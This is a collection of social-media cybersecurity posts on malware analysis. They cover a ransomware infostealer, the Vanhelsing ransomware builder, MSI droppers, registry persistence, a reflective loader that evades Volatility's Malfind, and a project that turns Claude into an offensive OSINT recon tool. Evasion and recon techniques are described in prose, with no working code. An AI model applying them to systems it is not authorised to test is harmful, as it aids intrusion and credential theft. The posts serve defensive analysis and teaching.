Ethical Hacking Techniques

My PC was infected by a #ransomware after I installed a cracked version of Adobe #Photoshop. The hacker told me to sit and cry, but what did i actually do? I reversed it. I used to love using #PiratedSoftware because it offered premium feature for free, but I also have zero tolerance for being hacked by someone as a result of using it. So, instead of paying the ransom while crying, I did the opposite. I stayed in the environment to see exactly how the malware was talking to the attacker’s server. Here is what i got from low-level analysis: 1. The executable file (Setup.exe) is a malware loader which drops multiple stages of payloads: Infostealer > RAT > RCE via cmd > ransomware 2. The malware Steals Discord authentication tokens from LevelDB, Telegram session files from tdata, and Steam session tokens from loginusers.vdf 3. It also steals saved passwords and cookies from 30+ Chromium browsers and all major Gecko-based browsers 4. Somehow the ransomware was not triggered in my 2nd run so, im stuck analyzing the ransomware part. 🖼️ The image below explains malware capabilites and my analysis result. Image 2: Browser credential theft flow, including autofill entries, email logins, payment data, and cookie-related data Image 3: Attacker's wallet address was decoded from hex to ASCII, resulting in C2 IP address Image 4: Exfiltration payload being recovered from memory before encryption, where it appears as a base64 blob beginning with ZIP magic bytes "If it's free, you're the product." So, avoid installing pirated software if you don't want your data being sold online. I have written my malware analysis result in the following link. Let me know your insight! 🔗 Link: https://lnkd.in/gfceCcMj #MalwareAnalysis #MalwareDevelopment #ReverseEngineering #CyberSecurity #CrackedSoftware #AdobePhotoshop

Analyzing the leaked code from the Vanhelsing Ransomware, it is essentially a highly modular and automated builder, developed in C++, designed to dynamically generate executable binaries (.exe) based on instructions received from a C2 server. The core logic includes a persistent loop (wmain) that continuously polls for new tasks via REST HTTP requests to an attacker-controlled endpoint. When a task is received, the system automatically compiles two binaries: the locker, responsible for encrypting the victim's files, and the decrypter, which allows for data recovery if the correct key is provided. The main payload is encrypted using AES-256-GCM (via libsodium), with a key derived from an X25519 key pair. The compiled locker binary is read, encrypted, converted into a binary header, and embedded into the loader, which is the final stage responsible for decrypting and executing the locker at runtime. The modular architecture allows the same locker to be reused with multiple loaders. File operations are handled directly through low-level Win32 API calls (CreateFileA, ReadFile, MoveFileA, DeleteFileA), with no dependency on external libraries. PowerShell’s Compress-Archive is also used to efficiently package and transmit artifacts via HTTP. There is a clear separation of responsibilities in the build pipeline: reading, encryption, macro substitution, architecture-specific compilation (Win32/x64), binary renaming, and upload to the C2 are all handled in well-defined stages, with error handling and diagnostics performed via GetLastError(). Summary of Evasion Techniques: - Encryption of artifacts using X25519 + AES-256-GCM - Use of fileless-like execution via loader with embedded payload - Per-build uniqueness through dynamic key and ID insertion - Compilation via MSBuild (LOLBin abuse) #redteam #cybersecurity #malware #malwaredevelopment #malwareanalysis

Malware analysts, this one’s for you. If you’re currently investigating an MSI file, always make sure to dump binaries from the Binary table and inspect the binary overlays. By reviewing the CustomActions table, it usually becomes clear very quickly which files are of real interest and which are less relevant. In a recent analysis of several EvilAI infections, we came across an MSI package that dropped a CAB file, fairly typical behavior for installer packages. However, this CAB archive contained a particularly suspicious C# executable, which, once disassembled, revealed the primary dropper functionality. Interestingly, many public write-ups on MSI-based malware, including this specific campaign, mention difficulties in identifying the actual dropper source or issues handling MSI files in general. That’s often a sign of overlooking how installer packages are structured. I highly recommend taking a deeper look at the MSI file format itself and familiarizing yourself with common installer frameworks such as WiX. We see similar analysis challenges with Inno Setup and comparable packagers. Always remember to examine the File sections, overlays, and magic bytes carefully, they often hold the key to uncovering what’s really going on. #MalwareAnalysis #ThreatResearch #EvilAI #ReverseEngineering #CyberSecurity #DigitalForensics

𝗗𝗶𝗴𝗶𝘁𝗮𝗹 𝗙𝗼𝗿𝗲𝗻𝘀𝗶𝗰𝘀 𝗧𝗶𝗽: 𝗛𝘂𝗻𝘁𝗶𝗻𝗴 𝗳𝗼𝗿 𝗣𝗲𝗿𝘀𝗶𝘀𝘁𝗲𝗻𝗰𝗲! 🕵️♀️ After a system is compromised, an attacker's top priority is to ensure their malware survives a reboot. They achieve this by leveraging 𝘼𝙪𝙩𝙤𝙧𝙪𝙣 mechanisms, which are legitimate Windows functions designed to launch programs and services automatically. By analyzing these registry keys, we can uncover hidden threats. 🔍 Here are two key locations to investigate: 𝟭. 𝗦𝘆𝘀𝘁𝗲𝗺 𝗕𝗼𝗼𝘁 𝗣𝗲𝗿𝘀𝗶𝘀𝘁𝗲𝗻𝗰𝗲 🖥️ Malware, especially sophisticated threats like 𝗥𝗼𝗼𝘁𝗸𝗶𝘁𝘀 and 𝗕𝗼𝘁𝗻𝗲𝘁𝘀, loves to embed itself in locations that run with high privileges at system startup, even before a user logs in.  • 𝗥𝗲𝗴𝗶𝘀𝘁𝗿𝘆 𝗣𝗮𝘁𝗵: `𝘏𝘒𝘌𝘠_𝘓𝘖𝘊𝘈𝘓_𝘔𝘈𝘊𝘏𝘐𝘕𝘌\𝘚𝘺𝘴𝘵𝘦𝘮\𝘊𝘶𝘳𝘳𝘦𝘯𝘵𝘊𝘰𝘯𝘵𝘳𝘰𝘭𝘚𝘦𝘵\𝘚𝘦𝘳𝘷𝘪𝘤𝘦𝘴`  • 𝗪𝗵𝗮𝘁 𝘁𝗼 𝗟𝗼𝗼𝗸 𝗙𝗼𝗿: Examine the `𝗜𝗺𝗮𝗴𝗲𝗣𝗮𝘁𝗵` value within each service's subkey. This value points to the 𝘦𝘹𝘦𝘤𝘶𝘵𝘢𝘣𝘭𝘦 𝘧𝘪𝘭𝘦 for that service. Finding an unfamiliar or suspicious path (e.g., in temporary user folders) is a strong indicator of a malicious service used for persistence. 𝟮. 𝗨𝘀𝗲𝗿-𝗟𝗲𝘃𝗲𝗹 𝗣𝗲𝗿𝘀𝗶𝘀𝘁𝗲𝗻𝗰𝗲 👤 Another strategic spot for malware is the `𝗦𝗵𝗲𝗹𝗹𝗦𝗲𝗿𝘃𝗶𝗰𝗲𝗢𝗯𝗷𝗲𝗰𝘁𝗗𝗲𝗹𝗮𝘆𝗟𝗼𝗮𝗱` key.  • 𝗥𝗲𝗴𝗶𝘀𝘁𝗿𝘆 𝗣𝗮𝘁𝗵: `𝘏𝘒𝘌𝘠_𝘓𝘖𝘊𝘈𝘓_𝘔𝘈𝘊𝘏𝘐𝘕𝘌\𝘚𝘖𝘍𝘛𝘞𝘈𝘙𝘌\𝘔𝘪𝘤𝘳𝘰𝘴𝘰𝘧𝘵\𝘞𝘪𝘯𝘥𝘰𝘸𝘴\𝘊𝘶𝘳𝘳𝘦𝘯𝘵𝘝𝘦𝘳𝘴𝘪𝘰𝘯\𝘚𝘩𝘦𝘭𝘭𝘚𝘦𝘳𝘷𝘪𝘤𝘦𝘖𝘣𝘫𝘦𝘤𝘵𝘋𝘦𝘭𝘢𝘺𝘓𝘰𝘢𝘥`  • 𝗪𝗵𝘆 𝗜𝘁'𝘀 𝗖𝗿𝗶𝘁𝗶𝗰𝗮𝗹: Any COM objects registered here are loaded directly by the 𝗘𝘅𝗽𝗹𝗼𝗿𝗲𝗿.𝗲𝘅𝗲 process when the graphical user interface starts. This ensures the malicious code executes early and with user privileges, making it a stealthy persistence method. Mastering these analysis techniques is essential for uncovering hidden malware and securing systems. Don't skip these crucial steps in your next investigation! ✅ #CyberSecurity #DFIR #MalwareAnalysis #WindowsForensics #Persistent #APT #DF

During recent memory forensics research I've been doing on evading memory scanners, I was researching how to bypass Volatility's 𝗠𝗮𝗹𝗳𝗶𝗻𝗱 plugin, and I developed a reflective PE loader for that. 𝗠𝗮𝗹𝗳𝗶𝗻𝗱 searches for memory regions where the VAD (Virtual Address Descriptor) shows both 𝗪𝗥𝗜𝗧𝗘 and 𝗘𝗫𝗘𝗖𝗨𝗧𝗘 permissions, since legitimate applications rarely allocate 𝗣𝗔𝗚𝗘_𝗘𝗫𝗘𝗖𝗨𝗧𝗘_𝗥𝗘𝗔𝗗𝗪𝗥𝗜𝗧𝗘 memory. This makes 𝗪+𝗫 a strong indicator of shellcode injection. But since VADs store the initial allocation protection set by 𝗩𝗶𝗿𝘁𝘂𝗮𝗹𝗔𝗹𝗹𝗼𝗰, when 𝗩𝗶𝗿𝘁𝘂𝗮𝗹𝗣𝗿𝗼𝘁𝗲𝗰𝘁 changes page permissions, only the underlying page table entries (PTEs) permissions are modified, while the VAD's 𝗔𝗹𝗹𝗼𝗰𝗮𝘁𝗶𝗼𝗻𝗣𝗿𝗼𝘁𝗲𝗰𝘁 field remains as originally set. To demonstrate this, I wrote a reflective loader that: 1. Allocates memory with 𝗣𝗔𝗚𝗘_𝗥𝗘𝗔𝗗𝗪𝗥𝗜𝗧𝗘 (VAD records: RW) 2. Writes the PE image, resolves imports, applies relocations 3. Calls 𝗩𝗶𝗿𝘁𝘂𝗮𝗹𝗣𝗿𝗼𝘁𝗲𝗰𝘁 to set 𝗣𝗔𝗚𝗘_𝗘𝗫𝗘𝗖𝗨𝗧𝗘_𝗥𝗘𝗔𝗗 on the .𝘁𝗲𝘅𝘁 section The VAD still shows 𝗣𝗔𝗚𝗘_𝗥𝗘𝗔𝗗𝗪𝗥𝗜𝗧𝗘 (no execute), so 𝗠𝗮𝗹𝗳𝗶𝗻𝗱 doesn't flag it. The code executes normally because the CPU uses the actual page permissions from the PTEs, not the VAD. This shows that in an investigation, relying on a single tool can lead to missed evidence and wrong conclusions. To detect this technique, dump private VAD regions (e.g., using Volatility's 𝘃𝗮𝗱𝗶𝗻𝗳𝗼 plugin with --𝗱𝘂𝗺𝗽) and scan for PE headers (𝗠𝗭/𝟬𝘅𝟰𝗗𝟱𝗔), which reveals injected code that 𝗠𝗮𝗹𝗳𝗶𝗻𝗱 misses. However, this approach requires filtering out legitimate PEs (e.g., Windows system DLLs), and this might take some time. In a follow-up post, I'll share a detection method I developed that reliably identifies reflectively loaded PEs regardless of VAD permissions. 𝗚𝗶𝘁𝗛𝘂𝗯: https://lnkd.in/dUFiGp8z #DFIR #IncidentResponse #MalwareAnalysis #CyberSecurity #MemoryForensics #Volatility

🚨 Claude is no longer just “chat with AI.” With the right skills, it can become an OSINT operator. I came across Claude-OSINT, an open-source GitHub project that packages offensive reconnaissance methodology into Claude Skills. 🔗 GitHub Repo: https://lnkd.in/g-CTBvyT And the idea is powerful: Instead of prompting Claude from scratch every time… you give it structured tradecraft. What makes this interesting? The project includes: ✅ 2 paired Claude Skills   ✅ 90+ recon modules   ✅ 48 secret-regex patterns   ✅ 80+ dorks   ✅ 9 read-only credential validators   ✅ 27 attack-path templates   ✅ 5,500+ lines of structured OSINT methodology  The two-skill model is smart: 🔹 osint-methodology   How to think. Asset graphs, severity logic, time budgeting, scope discipline, reporting templates. 🔹 offensive-osint   What to reach for. Dorks, regexes, probe paths, validators, tool references, reconnaissance workflows. 💡 My biggest takeaway: The future of AI in security is not just better models. It is better operational context. A generic AI assistant gives generic answers. But an AI assistant with structured skills, scoped methodology, and clear constraints becomes much more useful for real security work. 🚨 Important point: This type of workflow should only be used for assets you own or have written authorization to assess. AI does not remove responsibility. It increases the need for scope, logging, and discipline. Claude + OSINT skills can help with: • external attack surface mapping   • subdomain discovery   • identity and SSO mapping   • cloud exposure checks   • secret pattern review   • breach intelligence   • reporting and prioritization  The real shift is simple: ❌ Prompting from memory   ✅ Operating from methodology That’s where AI becomes useful for security teams. 💬 Would you trust an AI-assisted OSINT workflow in your recon process? #OSINT #ClaudeAI #AISecurity #CyberSecurity #RedTeam #BugBounty #ThreatIntelligence #Reconnaissance #InfoSec #AgenticAI

Fileless malware continues to challenge traditional security controls by operating in memory without leaving disk artifacts. Esra Kayhan's practical guide cuts through the complexity with actionable detection strategies: • Monitor PowerShell execution patterns, focusing on encoded commands, Invoke-Expression and DownloadString usage • Implement memory forensics with Volatility to identify in-memory PE headers and suspicious memory regions • Deploy YARA rules specifically designed for behavioral indicators in process memory • Leverage Sysmon for comprehensive telemetry including process creation, module loads, and network connections • Shift from file-based to behavior-based detection using PowerShell logging, WMI monitoring, and LOLBin abuse patterns The key takeaway? Effective fileless malware detection requires layering behavioral analysis, memory forensics and proper telemetry - not just signature matching. 🚀 Turn theory into practice. Learn actionable detection engineering and AI agents for security you can implement immediately. Secure your spot: https://buff.ly/oVDTAZf

If you’re analyzing malware, your virtual machine is your primary workspace. A well-configured lab lets you dig deeper, stay safe, and trust what you’re seeing. In my latest 🎥 video, I walk through how to build my ideal Windows 11 malware analysis lab. It's the same environment I use every day for real-world reverse engineering and teaching. I cover my virtualization setup, key configuration tweaks, and tools for static, dynamic, and code analysis. Drop a comment and let me know what you think! 👉 Watch the video here: https://lnkd.in/eRFzNdnp

If you’re studying Political Science and not exploring OSINT, you might be missing out on the fastest-growing career path in risk & security. Here’s why 👇 Most PolSci students get trained to read theories, debates, and history. But OSINT (Open-Source Intelligence) teaches you how to apply that knowledge to the real world. Think about it: 🔎 Instead of just studying “conflict theory,” you’re live-tracking how protests, coups, or cyberattacks unfold. 🗺️ Instead of writing about borders, you’re mapping satellite images or shipping routes. 📡 Instead of abstract debates, you’re decoding signals from Telegram, TikTok, or local news wires. 💡 Why this matters: Companies, NGOs, and governments all rely on OSINT analysts to anticipate disruptions, from supply chain risks to political instability. And PolSci students are naturally good at it because you already know how to connect dots across politics, society, and security. ✨ Want to start? Try these free resources: - OSINTCurious— beginner-friendly blogs & streams. - Trace Labs OSINT Discord — hands-on practice. - Bellingcat’s Guides — practical tutorials. PolSci isn’t just about books & exams anymore. It’s about being the person who can say: “I saw this coming.” ✨ Over the years, so many Humanities, Political Science & IR grads have reached out to me — usually feeling lost about what comes after the degree. 💡 Each time, I’ve shared a few resources that gave them clarity and helped them take real steps forward. And almost every single person comes back saying: “I wish I had this earlier.” 👉 If you’re figuring out your own path and don’t want to waste months in trial-and-error, just DM me or drop your email — I’ll share them with you too.

Part 2: Dynamic Malware Analysis Dynamic Malware Analysis is the process of running potentially malicious software in an isolated environment to monitor and analyze its actions and effects on the system. Key Aspects to Monitor: • File System Activity: Creation, modification, or deletion of files. • Process Activity: New processes spawned, process injection, or unusual process behavior. • Registry Changes: Modifications to registry keys and values. • Network Traffic: Outgoing connections, data exfiltration, or communication with suspicious IP addresses or domains. • Memory Activity: Unusual memory usage or memory injection techniques. • Persistence Mechanisms: Attempts to achieve persistence through startup entries, scheduled tasks, or services. • API Calls: Suspicious or uncommon API calls that might indicate malicious intent. • System Changes: Changes to system settings, configurations, or security policies. • Behavioral Anomalies: Any behavior that deviates from the norm, such as unexpected encryption or obfuscation. Tools for Dynamic Malware Analysis: Sandbox Environments Cuckoo Sandbox, FireEye , Joe Sandbox, Hybrid Analysis, Any.Run, VxStream Sandbox Process and System Monitoring: Process Monitor, Process Hacker, Autoruns, Noriben, Sysinternals Suite Network Analysis: Fiddler, Wireshark, TCPView, ApateDNS Static and Hybrid Analysis: VirusTotal, ReversingLabs TitaniumCloud, Intezer Analyze, Ghidra Registry and System Change Detection: Regshot Debugging and Code Analysis: OllyDbg, x64dbg, PE-sieve, Windbg, Radare2 Visual Analysis and Correlation: ProcDot Specialized Linux Toolkit: REMnux Other Tools: SysInternal Tools, CFF Explorer, PEView, BinText, PEiD, Regshot, HashMyFiles Detailed Focus Areas: Process Activities: Detect processes, focus on new child processes, DLL imports, and user context. Tools like Process Hacker help visualize these processes Network Activities: Analyze connections using Wireshark and Fiddler to understand and report the malware’s network activities Registry Activities: Monitor key registry locations HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce Tools like Regshot can compare registry states before and after malware execution to identify changes made by the malware. File Activities: Monitor directories like "Temp" and "Startup" for suspicious activities. '%TEMP%' for temporary files 'shell:startup' and 'shell:common startup' for startup directories Step-by-Step Guide for Dynamic Malware Analysis: 1. Prepare the Analysis Environment 2. Install Analysis Tools 3. Configure Monitoring Tools 4. Execute the Malware Sample 5. Monitor and Record Behavior 6. Analyze Collected Data 7. Restore the Environment BlackPerl DFIR #CyberSecurity #MalwareAnalysis #CyberDefense #Hacking